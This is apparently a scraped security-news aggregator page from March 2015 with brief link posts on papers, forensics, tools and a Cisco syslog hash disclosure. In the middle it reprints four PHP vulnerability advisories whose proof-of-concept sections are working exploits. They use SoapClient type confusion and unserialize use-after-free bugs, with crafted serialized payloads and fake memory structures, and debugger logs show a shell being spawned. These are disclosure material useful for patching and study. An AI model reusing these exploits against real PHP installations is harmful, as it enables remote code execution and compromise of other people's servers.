Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Shellcode

March 20, 2015, 10:15 am
$
0
0
This is a repository of Shellcode written by students in NYU-Polytechnic's ISIS lab. This repository came about as a need for trustworthy and reliable 32/64 bit Intel shellcode for CTF style exploitation.
more here.....https://github.com/isislab/Shellcode
Search

Valuable information on Kimble and Verto, Evolution Source Code, SQL Dump

March 20, 2015, 10:29 am
$
0
0
This may peak your curiousity regarding the valuable info posting here........ https://www.reddit.com/r/DarkNetMarkets/comments/2zlju6/valuable_information_on_kimble_and_verto/
and for those not familiar with this story and if interested you may want to read the article titled "A $50m Drug And Gun Dark Web Market Just Disappeared And Millions In Bitcoin With It. here....http://www.forbes.com/sites/thomasbrewster/2015/03/18/evolution-market-a-scam-says-site-pr/

Threat Spotlight: PoSeidon, A Deep Dive Into Point of Sale Malware

March 20, 2015, 1:42 pm
$
0
0
When consumers make purchases from a retailer, the transaction is processed through Point-of-Sale (PoS) systems. When a credit or debit card is used, a PoS system is used to read the information stored on the magnetic stripe on the back of the credit card. Once this information gets stolen from a merchant, it can be encoded into a magnetic stripe and used with a new card. Criminal markets exist for this valuable information because the attackers are able to easily monetize stolen credit card data. Incidents involving PoS malware have been on the rise, affecting many large organizations as well as small mom-and-pop establishments and garnering a lot of media attention. The presence of large amounts of financial and personal information ensures that these companies and their retail PoS systems will remain attractive targets.

more here........http://blogs.cisco.com/security/talos/poseidon

Paper: Understanding Digital Intelligence and the Norms That Might Govern It

March 20, 2015, 2:37 pm
$
0
0
This paper describes the nature of digital intelligence and provides context for the material published as a result of the actions of National Security Agency contractor Edward Snowden. It looks at the dynamic interaction between demands from government and law enforcement for digital intelligence, and at the new possibilities that digital technology has opened up for meeting such demands. The adequacy of previous regimes of legal powers and governance arrangements is seriously challenged just at a time when the objective need for intelligence on the serious threats facing civil society is apparent. This paper suggests areas where it might be possible to derive international norms, regarded as promoting standards of accepted behaviour that might gain widespread, if not universal, international acceptance, for the safe practice of digital intelligence.

more here..........https://www.cigionline.org/sites/default/files/gcig_paper_no8.pdf

Type Confusion Infoleak Vulnerabilities in SoapClient

March 20, 2015, 2:51 pm
$
0
0
# Type Confusion Infoleak Vulnerabilities in SoapClient

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.3.1
- Release Date: 2015.3.20

> Four type confusion vulnerabilities were discovered in SoapClient object's some methods that can be abused for leaking arbitrary memory blocks.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.7
Affected is PHP 5.5 < 5.5.23
Affected is PHP 5.4 < 5.4.39
Affected is PHP 5.3 <= 5.3.29

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------

```
PHP_METHOD(SoapClient, __getLastRequest)
{
        zval **tmp;

        if (zend_parse_parameters_none() == FAILURE) {
                return;
        }

        if (zend_hash_find(Z_OBJPROP_P(this_ptr), "__last_request",
sizeof("__last_request"), (void **)&tmp) == SUCCESS) {
                RETURN_STRINGL(Z_STRVAL_PP(tmp), Z_STRLEN_PP(tmp), 1);
        }
        RETURN_NULL();
}
```

The Z_STRVAL_P macro lead to looking up an arbitrary valid memory
address, and return a string via a doubles-type or integer-type zval
that start from this memory address. If the memory address is an
invalid memory position, it should result in a crash.

The Z_STRLEN_PP macro for accessing str.len member from the
zvalue_value union, and return string's length. For integers the
Z_STRLEN_PP macro is generally return 1, so a integer-type ZVAL can
collide a string of length 1. The size of a double is 8 bytes, so on
32bit system a double-type ZVAL can collide a string of any length

The very similar bugs exists in SoapClient object's
__getLastResponse(), __getLastRequestHeaders(), and
__getLastResponseHeaders() methods.

Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.10.3 installation of PHP 5.5.14.

```
<?php

$z = new SoapClient(null, array('location' => "", 'uri' => ""));
$str = '';
for ($i = 0x100351e3d; $i < 0x100351e3d + 25; $i++) {
    $z->__last_request = $i;
    $str .= $z->__getLastRequest();
}
var_dump($str);

?>
```

Test the PoC on the command line, then output some memory blocks:

```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run test.php
Process 6366 launched: '/usr/bin/php' (x86_64)
string(25) "UH??AWAVSPI??I??H????
                                 H"
Process 6366 exited with status = 0 (0x00000000)

Type Confusion Vulnerability in SoapClient

March 20, 2015, 2:53 pm
$
0
0
# Type Confusion Vulnerability in SoapClient

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.3.1
- Release Date: 2015.3.20

> A type confusion vulnerability was discovered in SoapClient object's __getCookies() method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.7
Affected is PHP 5.5 < 5.5.23
Affected is PHP 5.4 < 5.4.39
Affected is PHP 5.3 <= 5.3.29

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------
```
PHP_METHOD(SoapClient, __getCookies)
{
        zval **cookies, *tmp;

        if (zend_parse_parameters_none() == FAILURE) {
                return;
        }

        array_init(return_value);

        if (zend_hash_find(Z_OBJPROP_P(this_ptr), "_cookies",
sizeof("_cookies"), (void **)&cookies) != FAILURE) {
                zend_hash_copy(Z_ARRVAL_P(return_value), Z_ARRVAL_P(*cookies),
(copy_ctor_func_t) zval_add_ref, (void *)&tmp, sizeof(zval*));
        }
}
```

The Z_ARRVAL_P macro leads to pointing a fake array-type ZVAL in
memory via a fake HashTable and a fake Bucket. This should result in
arbitrary code execution.

Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.10.3 installation of PHP 5.5.14.

```
<?php

ini_set("memory_limit", -1);

if ($_SERVER['argc'] < 2) {
        $_SERVER['argv'][1] = 'system(sh);exit;';
}

setup_memory();

$exploit = 'O:10:"SoapClient":1:{s:8:"_cookies";s:'.strlen($hashtable).':"'.$hashtable.'";}';
$z = unserialize($exploit);
// $z = new SoapClient(null, array('location' => "", 'uri' => ""));
// $z->_cookies = $hashtable;
$z->__getCookies();

function setup_memory()
{
        global $str, $hashtable;

        $base = 0x114000020;
        $bucket_addr = $base;
        $zval_delta = 0x100;
        $hashtable_delta = 0x200;
        $zval_addr = $base + $zval_delta;
        $hashtable_addr = $base + $hashtable_delta;
        $func_addr = 0x100351e3d; // zend_eval_string()'s address

        $bucket  = "\x01\x00\x00\x00\x00\x00\x00\x00";
        $bucket .= "\x00\x00\x00\x00\x00\x00\x00\x00";
        $bucket .= ptr2str($bucket_addr + 3*8);
        $bucket .= ptr2str($zval_addr);
        $bucket .= ptr2str(0);
        $bucket .= ptr2str(0);
        $bucket .= ptr2str(0);
        $bucket .= ptr2str(0);
        $bucket .= ptr2str(0);

        $hashtable  = "\x00\x00\x00\x00";
        $hashtable .= "\x00\x00\x00\x00";
        $hashtable .= "\x01\x00\x00\x00";
        $hashtable .= "\x00\x00\x00\x00";
        $hashtable .= "\x00\x00\x00\x00\x00\x00\x00\x00";
        $hashtable .= ptr2str(0);
        $hashtable .= ptr2str($bucket_addr);
        $hashtable .= ptr2str(0);
        $hashtable .= ptr2str(0);
        $hashtable .= ptr2str(0);
        $hashtable .= "\x00";
        $hashtable .= "\x00";

        $zval = ptr2str($hashtable_addr);
        $zval .= ptr2str(0);
        $zval .= "\x00\x00\x00\x00";
        $zval .= "\x04";
        $zval .= "\x00";
        $zval .= ptr2str(0);
        $zval .= ptr2str(0);
        $zval .= ptr2str(0);

        $shellcode = ptr2str(0);
        $shellcode .= ptr2str(0);
        $shellcode .= ptr2str(0);
        $shellcode .= ptr2str(0);
        $shellcode .= ptr2str($hashtable_addr + 6*8);
        $shellcode .= ptr2str(0);
        $shellcode .= ptr2str(0);
        $shellcode .= ptr2str($func_addr);
        $shellcode .= ptr2str($hashtable_addr + 9*8);
        $shellcode .= "\x65\x76\x61\x6c\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x27\x61\x72\x67\x76\x27\x5d\x5b\x31\x5d\x29\x3b\x00";
// eval($_SERVER['argv'][1]);

        $part = str_repeat("\x73", 4096);
        for ($j=0; $j<strlen($bucket); $j++) {
                $part[$j] = $bucket[$j];
        }
        for ($j=0; $j<strlen($shellcode); $j++) {
                $part[$j+$hashtable_delta] = $shellcode[$j];
        }
        for ($j=0; $j<strlen($zval); $j++) {
                $part[$j+$zval_delta] = $zval[$j];
        }

        $str = str_repeat($part, 1024*1024*256/4096);
}

function ptr2str($ptr)
{
        $out = "";
        for ($i=0; $i<8; $i++) {
                $out .= chr($ptr & 0xff);
                $ptr >>= 8;
        }
        return $out;
}

?>
```

Test the PoC on the command line, then any PHP code can be executed:

```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run tcpoc.php 'system\(sh\)\;exit\;'
Process 2606 launched: '/usr/bin/php' (x86_64)
sh: no job control in this shell
sh-3.2$ php -v
PHP 5.5.14 (cli) (built: Jan  8 2015 22:33:37)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
sh-3.2$ exit
exit
Process 2606 exited with status = 0 (0x00000000)
(lldb)

Use After Free Vulnerability in unserialize() with DateInterval

March 20, 2015, 2:56 pm
$
0
0
#Use After Free Vulnerability in unserialize() with DateInterval

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date:
2015.2.28 - Release Date: 2015.3.20

> A use-after-free vulnerability was discovered in unserialize() with DateInterval object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.7
Affected is PHP 5.5 < 5.5.23
Affected is PHP 5.4 < 5.4.39
Affected is PHP 5.3 <= 5.3.29

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------

```
static int php_date_interval_initialize_from_hash(zval **return_value,
php_interval_obj **intobj, HashTable *myht TSRMLS_DC)
{
        (*intobj)->diff = timelib_rel_time_ctor();

#define PHP_DATE_INTERVAL_READ_PROPERTY(element, member, itype, def) \
        do { \
                zval **z_arg = NULL; \
                if (zend_hash_find(myht, element, strlen(element) + 1, (void**)
&z_arg) == SUCCESS) { \
                        convert_to_long(*z_arg); \
                        (*intobj)->diff->member = (itype)Z_LVAL_PP(z_arg); \
                } else { \
                        (*intobj)->diff->member = (itype)def; \
                } \
        } while (0);

#define PHP_DATE_INTERVAL_READ_PROPERTY_I64(element, member) \
        do { \
                zval **z_arg = NULL; \
                if (zend_hash_find(myht, element, strlen(element) + 1, (void**)
&z_arg) == SUCCESS) { \
                        convert_to_string(*z_arg); \
                        DATE_A64I((*intobj)->diff->member, Z_STRVAL_PP(z_arg)); \
                } else { \
                        (*intobj)->diff->member = -1LL; \
                } \
        } while (0);
```

The convert_to_long()\convert_to_string() leads to the ZVAL and all
its children is freed from memory. However the unserialize() code will
still allow to use R: or r: to set references to that already freed
memory. There is a use after free vulnerability, and allows to execute
arbitrary code.

Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14.

```
<?php

$f = $argv[1];
$c = $argv[2];

$fakezval1 = ptr2str(0x100b83008);
$fakezval1 .= ptr2str(0x8);
$fakezval1 .= "\x00\x00\x00\x00";
$fakezval1 .= "\x06";
$fakezval1 .= "\x00";
$fakezval1 .= "\x00\x00";

$data1 = 'a:3:{i:0;O:12:"DateInterval":1:{s:1:"y";a:2:{i:0;i:1;i:1;i:2;}}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:5;}}';

$x = unserialize($data1);
$y = $x[2];

// zend_eval_string()'s address
$y[0][0] = "\x6d";
$y[0][1] = "\x1e";
$y[0][2] = "\x35";
$y[0][3] = "\x00";
$y[0][4] = "\x01";
$y[0][5] = "\x00";
$y[0][6] = "\x00";
$y[0][7] = "\x00";

$fakezval2 = ptr2str(0x3b296324286624); // $f($c);
$fakezval2 .= ptr2str(0x100b83000);
$fakezval2 .= "\x00\x00\x00\x00";
$fakezval2 .= "\x05";
$fakezval2 .= "\x00";
$fakezval2 .= "\x00\x00";

$data2 = 'a:3:{i:0;O:12:"DateInterval":1:{s:1:"y";a:2:{i:0;i:1;i:1;i:2;}}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;O:12:"DateInterval":1:{s:1:"y";a:1:{i:0;R:5;}}}';

$z = unserialize($data2);

function ptr2str($ptr)
{
        $out = "";
        for ($i=0; $i<8; $i++) {
                $out .= chr($ptr & 0xff);
                $ptr >>= 8;
        }
        return $out;
}

?>
```

Test the PoC on the command line, then any PHP code can be executed:

```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)"
Process 13472 launched: '/usr/bin/php' (x86_64)
sh: no job control in this shell
sh-3.2$ php -v
PHP 5.5.14 (cli) (built: Sep  9 2014 19:09:25)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
sh-3.2$ exit
exit
Process 13472 exited with status = 0 (0x00000000)
(lldb)

Use After Free Vulnerability in unserialize()

March 20, 2015, 3:08 pm
$
0
0
#Use After Free Vulnerability in unserialize()

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.2.3
- Release Date: 2015.3.20

> A use-after-free vulnerability was discovered in unserialize() with a specially defined object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.7
Affected is PHP 5.5 < 5.5.23
Affected is PHP 5.4 < 5.4.39
Affected is PHP 5 <= 5.3.29
Affected is PHP 4 <= 4.4.9

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------

```
static inline int object_common2(UNSERIALIZE_PARAMETER, zend_long elements)
{
        zval retval;
        zval fname;

        if (Z_TYPE_P(rval) != IS_OBJECT) {
                return 0;
        }

        //??? TODO: resize before
        if (!process_nested_data(UNSERIALIZE_PASSTHRU, Z_OBJPROP_P(rval),
elements, 1)) {
                return 0;
        }

        ZVAL_DEREF(rval);
        if (Z_OBJCE_P(rval) != PHP_IC_ENTRY &&
                zend_hash_str_exists(&Z_OBJCE_P(rval)->function_table, "__wakeup",
sizeof("__wakeup")-1)) {
                ZVAL_STRINGL(&fname, "__wakeup", sizeof("__wakeup") - 1);
                BG(serialize_lock)++;
                call_user_function_ex(CG(function_table), rval, &fname, &retval, 0,
0, 1, NULL);
```

A specially defined __wakeup() magic method lead to various problems.

The simple code:

```
<?php

class evilClass {

        public $var;

        function __wakeup() {
                unset($this->var);
//              $this->var = 'ryat';
        }
}

$data = unserialize('a:2:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;R:4;}');

?>
```

Object properties assignment or destroy operation leads to the ZVAL
and all its children is freed from memory. However the unserialize()
code will still allow to use R: or r: to set references to that
already freed memory. There is a use after free vulnerability, and
allows to execute arbitrary code.

Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14.

```
<?php

$f = $argv[1];
$c = $argv[2];

$fakezval1 = ptr2str(0x100b83008);
$fakezval1 .= ptr2str(0x8);
$fakezval1 .= "\x00\x00\x00\x00";
$fakezval1 .= "\x06";
$fakezval1 .= "\x00";
$fakezval1 .= "\x00\x00";

$data1 = 'a:3:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}';

$x = unserialize($data1);
$y = $x[2];

// zend_eval_string()'s address
$y[0][0] = "\x6d";
$y[0][1] = "\x1e";
$y[0][2] = "\x35";
$y[0][3] = "\x00";
$y[0][4] = "\x01";
$y[0][5] = "\x00";
$y[0][6] = "\x00";
$y[0][7] = "\x00";

$fakezval2 = ptr2str(0x3b296324286624); // $f($c);
$fakezval2 .= ptr2str(0x100b83000);
$fakezval2 .= "\xff\xff\xff\xff";
$fakezval2 .= "\x05";
$fakezval2 .= "\x00";
$fakezval2 .= "\x00\x00";

$data2 = 'a:3:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;a:1:{i:0;R:4;}}}';

$z = unserialize($data2);
intval($z[2]);

function ptr2str($ptr)
{
        $out = "";
        for ($i=0; $i<8; $i++) {
                $out .= chr($ptr & 0xff);
                $ptr >>= 8;
        }
        return $out;
}

class evilClass {

        public $var;

        function __wakeup() {
                unset($this->var);
//              $this->var = 'ryat';
        }
}

?>
```

Test the PoC on the command line, then any PHP code can be executed:

```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)"
Process 13472 launched: '/usr/bin/php' (x86_64)
sh: no job control in this shell
sh-3.2$ php -v
PHP 5.5.14 (cli) (built: Sep  9 2014 19:09:25)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
sh-3.2$ exit
exit
Process 13472 exited with status = 0 (0x00000000)
(lldb)
Search

Automated algebraic cryptanalysis with OpenREIL and Z3

March 21, 2015, 2:03 am
$
0
0
One week ago I released my OpenREIL project - open source implementation of well known Reverse Engineering Intermediate Language (REIL). OpenREIL library has much more features than just binary to IR (intermediate representation) translation, you can check documentation to learn how to use it and what it can do. In this blog post I want to demonstrate a practical example of using OpenREIL to solve Kao's Toy Project crackme puzzle with automated algebraic cryptanalysis.

more here.........http://blog.cr4.sh/2015/03/automated-algebraic-cryptanalysis-with.html

XML External Entity (XXE) Injection in Apache Batik Library [CVE-2015-0250]

March 21, 2015, 2:06 am
$
0
0
During one of our latest web application code review projects I came across a vulnerability for which I think it is worth to speak about. It is an injection based attack against XML parsers which uses a rarely required feature called external entity expansion. The XML specification allows XML documents to define entities which reference resources external to the document and parsers typically support this feature by default. If an application parses XML input from untrusted sources and the parsing routine is not properly configured this can be exploited by an attacker with a so called XML external entity (XXE) injection. A successful XXE injection attack could allow an attacker to access the file system, cause a DoS attack or inject script code (e.g. Javascript to perform an XSS attack).

more here.......http://www.insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/

Paper: Introduction to Modern Code Virtualization

March 21, 2015, 2:13 am
$
0
0
This paper describes how code protection is done via “virtual machines” and techniques used in  popular virtual machines, giving a considerable level of understanding of such virtual machines for readers from beginners to professionals.


more here..............http://www.scribd.com/doc/222907805/Introduction-to-Modern-Code-Virtualization

Office Alerts: Yes, We Care About These

March 21, 2015, 3:03 am
$
0
0
In this short post, I wanted to take a few and examine a fun little artifact: OAlerts.evtx. Is this a "new" artifact? No, not necessarily. However, I think there can be a wealth of information within this artifact if it relates to what you're trying to find. As forensic investigators continue to find out more about user interaction while on a certain box, this event log may or may not assist you in recreating those timelines.

While an entire book could be written to go over the forensic value of each event log (hmm...), I recently had some success within OAlerts.evtx. Seeing as I couldn't find much else in the form of write-ups (simple Google search), I figured I'd share my experience with others here......http://www.505forensics.com/office-alerts-we-care-about-these/

3vilTwinAttacker v0.5.3 Release

March 21, 2015, 4:17 am
$
0
0
This tool create an rogue Wi-Fi access point , purporting to provide wireless Internet services, but snooping on the traffic.

more here.......https://github.com/P0cL4bs/3vilTwinAttacker

PaX Refcount Protection Explained Documentation

March 21, 2015, 6:59 am
$
0
0
Abstract

This document defines the inner workings of PaX's reference counter protection and aims to create a bigger community around the project.

It begins with an overview of the PaX Project and reference counter protection, goes into a higher-level explanation of how it is implemented, and then goes deep inside the implementation's code, enabling readers to more easily port the feature to new platforms.

Special focus is placed on the reasoning for the PowerPC implementation, developed by the author while learning the internals of this protection mechanism.

more here......https://forums.grsecurity.net/viewtopic.php?f=7&t=4173#p15110

Detect System File Manipulations with SysInternals Sysmon

March 21, 2015, 9:25 am
$
0
0
SysInternals Sysmon is a powerful tool especially when it comes to anomaly detection. I recently developed a method to detect system file manipulations, which I would like to share with you.

We know how to track processes with the standard Windows audit policy option “Audit process tracking”, but Sysmon messages contain much more information to evaluate. By using Sysmon on many systems within the network and collecting all the logs in a central location you’ll get a database full of interesting attributes and Metadata which can be statistically analyzed in order to identify anomalies.

more here........https://www.bsk-consulting.de/2015/03/21/detect-system-file-manipulations-with-sysinternals-sysmon/
Search

oclHashcat v1.34 release

March 21, 2015, 9:27 am
$
0
0
This version 1.34 is about performance increase and bug fixes. Even if you did not face any errors with v1.33 we recommend upgrading.

more here.........https://hashcat.net/forum/thread-4203.html

Defeating EMET 5.2 Protections (2)

March 21, 2015, 12:44 pm
$
0
0
Since my last post, i've thought maybe its not bad to explain how bypassing EMET protections work rather than giving out a weaponized POC here.......http://casual-scrutiny.blogspot.in/2015/03/defeating-emet-52-protections-2.html

Few days old but didn't see this until now "Court Orders Erie County Sheriff to Disclose Use of Stingray Surveillance Device"

March 21, 2015, 12:47 pm
$
0
0
In a victory for the public’s right to know, a Supreme Court judge in Buffalo this afternoon ruled that the Erie County Sheriff’s Office must disclose public information “stingrays,” devices that can track and record New Yorkers’ locations via their cell phones. The New York Civil Liberties Union sued the Sheriff’s Office in November for failing to follow the law and respond to public information about how it uses the devices.

more here.........http://www.nyclu.org/news/court-orders-erie-county-sheriff-disclose-use-of-stingray-surveillance-device

On the state of cryptography in Haskell

March 21, 2015, 2:37 pm
$
0
0
In the past months, I was attempting to write an application that uses cryptographic primitives in Haskell. In the process I found out some disturbing things about the state of cryptography in Haskell of which I think more people should be aware. I am trying to present you with as many facts as possible, but I will also draw my own conclusions from these facts. My conclusions are fairly paranoid, since I think developing crypto software requires a certain level of professional paranoia. You might not necessarily agree with this and are free to draw your own conclusions.

more here........http://www.leonmergen.com/haskell/crypto/2015/03/21/on-the-state-of-cryptography-in-haskell.html

Cisco Unified Computing System Manager (UCSM) username and password hashes sent via SYSLOG

March 22, 2015, 1:47 am
$
0
0
Subject:  Cisco UCSM username and password hashes sent via SYSLOG

Impact:   Information Disclosure / Privilege Elevation

Vendor:   Cisco
Product:  Cisco Unified Computing System Manager (UCSM)
Notified: 2014.10.31
Fixed:    2015.03.06 ( 2.2(3e) )

Author:   Tom Sellers ( tom at fadedcode.net )
Date:     2015.03.21


Description:
============

Cisco Unified Computing System Manager (UCSM) versions 1.3 through 2.2 sends local (UCSM) username and password hashes to the configured SYSLOG server every 12 hours. If the

Fabric Interconnects are in a cluster then each member will transmit the data.


SYSLOG Example ( portions of password hash replaced with <!snip!> ):


Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:User1,$1$e<!snip!>E.,-1.000000,16372.000000 - securityd
Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:admin,$1$J<!snip!>71,-1.000000,16372.000000 - securityd
Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:samdme,!,-1.000000,16372.000000 - securityd


Vulnerable environment(s):
==========================

Cisco Unified Computing System Manager (UCSM) is a Cisco product that manages all aspects of the Unified Computing System (UCS) environment including Fabric Interconnects, B-

Series blades servers and the related blade chassis.  C-Series (non-blade) servers can also be managed.  These solutions are deployed in high performance / high density

compute solutions and allow for policy based and rapid deployment of resources.  They are are typically found in Data Center class environments with 10/40 GB network and 8/16

GB Fibre Channel connectivity.


Software Versions:  1.3 - 2.2(1b)A

Hardware:  Cisco 6120 XP, 6296 UP


SYSLOG Configuration:

- Level:    Information
- Facility: Local7

- Faults: Enabled
- Audits: Enabled
- Events: Disabled


Risks:
======
1. Individuals who have access to the SYSLOG logs may not be authorized to have access to the UCSM environment and this information represents an exposure.

2. Authorized users with the 'Operations' roles can configure SYSLOG settings, capture hashes, crack them, and elevate access to Administrator within the UCSM.

3. SYSLOG is transmitted in plain text.


Submitter recommendations to vendor:
====================================
1. Remove the username and password hash data from the SYSLOG output.

2. Allow the configuration of the SYSLOG destination port to enable easier segmentation of SYSLOG data on the log aggregation system.

3. Add support for TLS wrapped SYSLOG output.


Vendor response/resolution:
==========================
After being reported on October 30, 2014 the issue was handed from Cisco PSIRT to internal development where it was treated as a standard bug.  Neither the PSIRT nor Cisco

TAC were able to determine the status of the effort other than it was in progress with an undetermined release date.  On March 6, 2015 version 2.2(3e) of the UCSM software

bundle was released and the release notes contained the following text:

---
Cisco UCS Manager Release 1.3 through Release 2.2 no longer sends UCS Manager username and password hashes to the configured SYSLOG server every 12 hours.
---

For several weeks a document related to this issue could be found in the Cisco Security Advisories, Responses, and Alerts site [1] but this has since been removed.

Documents detailing similar issues [2] have been released but none reference the Bug/Defect ID I was provided and the affected versions do not match.

The following documents remain available:

Public URL for Defect:        https://tools.cisco.com/quickview/bug/CSCur54705
Bug Search (login required):  https://tools.cisco.com/bugsearch/bug/CSCur54705
Release notes for 2.2(3e):    http://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/release/notes/ucs_2_2_rn.html#21634


Associated vendor IDs:  PSIRT-1394165707  CSCur54705

Timeline:
============
2014.10.30 Reported to psirt@cisco.com
2014.11.04 Response from PSIRT, assigned PSIRT-1394165707
2014.11.06 Follow up questions from Cisco, response provided same day
2014.11.12 Status request. PSIRT responded that this had been handed to development and assigned defect id CSCur54705.
2014.12.04 As PSIRT doesn't own the bug any longer, opened TAC case requesting status.
2014.12.10 Response from Cisco TAC indicating that perhaps I should upgrade to the latest version at that time
2014.12.12 Discussion with TAC, unable to gather required status update internally, TAC case closed with my permission

2015.02.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information
2015.02.05 Sent status update request to PSIRT, response was that bug was fixed internally, release pending testing, release cycle, etc.
2015.02.11 Follow up from Cisco to ensure that no additional information was required, closure of my request with my permission
2015.02.13 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information
2015.03.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information
2015.03.06 Update to public bug document, indicates that vulnerability is fixed in 2.2(3e)


Reference:

1 - http://tools.cisco.com/security/center/publicationListing.x
2 - http://tools.cisco.com/security/center/viewAlert.x?alertId=36640  ( CVE-2014-8009 )
Viewing all 8064 articles
Browse latest View live
Search